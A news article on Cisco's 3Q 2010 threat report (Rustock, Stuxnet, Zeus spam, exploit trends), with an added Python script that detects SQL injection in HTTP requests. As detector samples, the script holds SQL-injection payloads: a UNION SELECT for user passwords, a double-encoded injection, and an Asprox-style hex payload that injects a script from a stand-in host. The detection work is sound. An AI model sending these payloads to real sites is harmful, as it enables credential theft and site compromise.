Cisco's Global Threat Report examines the most prevalent Web malware, e-mail attacks, exploits and other cyber-crime incidents from July to September 2010.
Botnet activity, malicious spam and a resurgence of SQL injection attacks were among the most significant cyber-crime threats during the third quarter of 2010, according to a multiteam report from Cisco released Nov. 17.
According to the report, enterprise users experienced an average of 133 Web malware encounters per month. August was the most prolific month, peaking at more than 140 malware encounters, Cisco researchers said. Spam volumes were also highest in August, compared with the rest of the quarter.
The Rustock botnet was the most frequently encountered, according to Cisco Remote Operations Services (ROS), which remotely monitors, alerts on and remediates threats for enterprise customers. The botnet is believed to be one of the largest sources of spam, especially pharmaceutical spam, said Mary Landesman, market intelligence manager at Cisco. Rustock activity peaked in late August 2010 and declined in September, the researchers said.
The pharmaceutical and chemical industries were most at risk for Web malware in the third quarter, according to the report, followed by energy and oil, and by agriculture and mining. The least at risk were the aviation and automotive industries.
Cisco ROS also reported that Stuxnet exploiting the Windows Print Spooler vulnerability was the "fifth most prevalent event" the team detected during the quarter. Rustock was the most prevalent, accounting for 21 percent of all events handled by ROS during the third quarter, compared with Stuxnet's five percent.
Stuxnet hit the United Kingdom hardest, with that region accounting for 38 percent of affected users, followed by Hong Kong at 25 percent.
The volume of spam dropped in September for eight of the top 10 spam-sending countries, but the amount of spam sent from Russia and Ukraine increased, according to the report.
Malicious LinkedIn
spam spreading the Zeus
Trojan dominated September activity, accounting for 31.26 percent of all
spam during that period.
The report examined the "Here You Have" e-mail worm
outbreak, noting that 79 percent of the clicks occurred during the first three
hours of the worm's spread and that it accounted for 10 percent of total spam
volume before it was taken offline.
The most common exploits during the first half of 2010 were those targeting Adobe Reader, Acrobat, Sun Java and Adobe Flash, according to Cisco. That trend continued for Sun Java: exploits targeting the Java platform rose from five percent of all malware encounters in July to seven percent in September, said Landesman.
However, despite the various PDF-related threats reported during the period, attacks targeting Adobe Reader and Acrobat actually declined over the quarter, Landesman said.
Cisco IPS reported four types of SQL injection attacks: encoded SQL keywords embedded in HTTP requests, attacks causing a stack overflow in MSSQL, generic SQL keywords within HTTP requests, and SQL injection attacks from the Asprox botnet. The botnet recurred briefly in the first half of August, according to the report, targeting Web sites built on ASP.
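The HTTP-visible categories in that list (SQL keywords in a request, the same keywords hidden behind one or two layers of URL encoding, and a hex-encoded T-SQL payload of the kind associated with Asprox aimed at .asp pages) can be flagged from request lines alone. The script below is an added example written for this article; it is not Cisco IPS signature logic, and the sample request lines and the Asprox-style DECLARE/CAST/EXEC shape it looks for are assumptions constructed for the example. The MSSQL stack-overflow category needs protocol-level data and is not modelled.

```python
"""Flag SQL-injection indicators in HTTP request lines.

Added example for this article, not Cisco IPS logic. It models three of the
four categories the report lists: generic SQL keywords in HTTP requests,
URL-encoded (including double-encoded) SQL, and an Asprox-style hex-encoded
T-SQL injection against .asp pages. Sample requests below are constructed.
"""
import re
from urllib.parse import unquote_plus

# Keywords alone are noisy (a search for "select a laptop" is benign), so a
# request is tagged only when two distinct keywords appear, or one keyword
# appears together with a quote, comment or statement-separator marker.
SQL_KEYWORDS = re.compile(
    r"\b(select|union|insert|update|delete|drop|exec|declare|cast|xp_cmdshell)\b", re.I)
SQL_MARKERS = re.compile(r"'|--|;|/\*")

# Assumed Asprox-style shape (from public descriptions of that campaign):
# DECLARE @v VARCHAR(n); SET @v=CAST(0x<hex> AS VARCHAR(n)); EXEC(@v)
ASPROX_STYLE = re.compile(
    r"declare\s+@\w+\s+n?varchar\(\d+\).*?cast\(0x([0-9a-f]+)\s+as\s+n?varchar",
    re.I | re.S)


def decode_layers(text, max_rounds=3):
    """URL-decode repeatedly until the text stops changing.

    Returns (decoded_text, rounds). rounds >= 2 means the value was
    double-encoded, a common way to slip past a single-pass filter.
    """
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text, rounds = decoded, rounds + 1
    return text, rounds


def classify(request_line):
    """Return {"tags": set, "decoded_query": str, "hex_payload": str|None}."""
    parts = request_line.split(" ", 2)          # METHOD TARGET VERSION
    if len(parts) != 3:
        return {"tags": {"malformed"}, "decoded_query": "", "hex_payload": None}
    path, _, query = parts[1].partition("?")
    decoded, rounds = decode_layers(query)
    tags, hex_payload = set(), None

    m = ASPROX_STYLE.search(decoded)
    if m:
        tags.add("asprox-style")
        try:  # decode the hex literal so an analyst sees what CAST() hides
            hex_payload = bytes.fromhex(m.group(1)).decode("latin-1")
        except ValueError:
            hex_payload = None
        if path.lower().endswith(".asp"):
            tags.add("asp-target")
    else:
        keywords = {k.lower() for k in SQL_KEYWORDS.findall(decoded)}
        if len(keywords) >= 2 or (keywords and SQL_MARKERS.search(decoded)):
            tags.add("sql-keywords")

    if tags:
        if rounds >= 1:
            tags.add("url-encoded")
        if rounds >= 2:
            tags.add("double-encoded")
    return {"tags": tags, "decoded_query": decoded, "hex_payload": hex_payload}


# Constructed sample request lines (not taken from the Cisco report).
PAYLOAD_TEXT = ("UPDATE pages SET body=body+'<script src=\"http://example.invalid/a.js\">"
                "</script>'")
SAMPLE_REQUESTS = [
    "GET /products.asp?id=7 HTTP/1.1",
    "GET /search?q=how+to+select+a+laptop HTTP/1.1",
    "GET /products.asp?id=7%27%20UNION%20SELECT%20username%2Cpassword%20FROM%20users-- HTTP/1.1",
    "GET /search?q=%2527%2520or%25201%253D1%2520union%2520select HTTP/1.1",
    "GET /news.asp?id=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    + PAYLOAD_TEXT.encode().hex() + "%20AS%20VARCHAR(4000));EXEC(@S);-- HTTP/1.1",
]


def scan(lines=SAMPLE_REQUESTS):
    """Classify every line and return only the ones that were tagged."""
    results = [(line, classify(line)) for line in lines]
    return [(line, r) for line, r in results if r["tags"]]


if __name__ == "__main__":
    for line, result in scan():
        print(sorted(result["tags"]), result["decoded_query"][:70])
        if result["hex_payload"]:
            print("  hidden payload:", result["hex_payload"])
```

Run as-is it flags three of the five constructed requests; the two benign ones, including the search phrase containing the lone keyword "select", stay clean. The double-decode loop is the part worth keeping: a filter that decodes once would see `%27` instead of a quote on the fourth sample and miss it.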
Approximately 10 percent of Web malware was encountered via search engine traffic and services, researchers found. More than seven percent of Web malware encounters came from Google referrers, followed by Yahoo at two percent and Bing at one percent.
The Cisco 3Q10 Global Threat Report covers the third quarter, from July 1 to Sept. 30. It draws on data from multiple Cisco teams, including Cisco Remote Management Services, Cisco IPS, Cisco IronPort for e-mail security and ScanSafe for Web security, according to Landesman.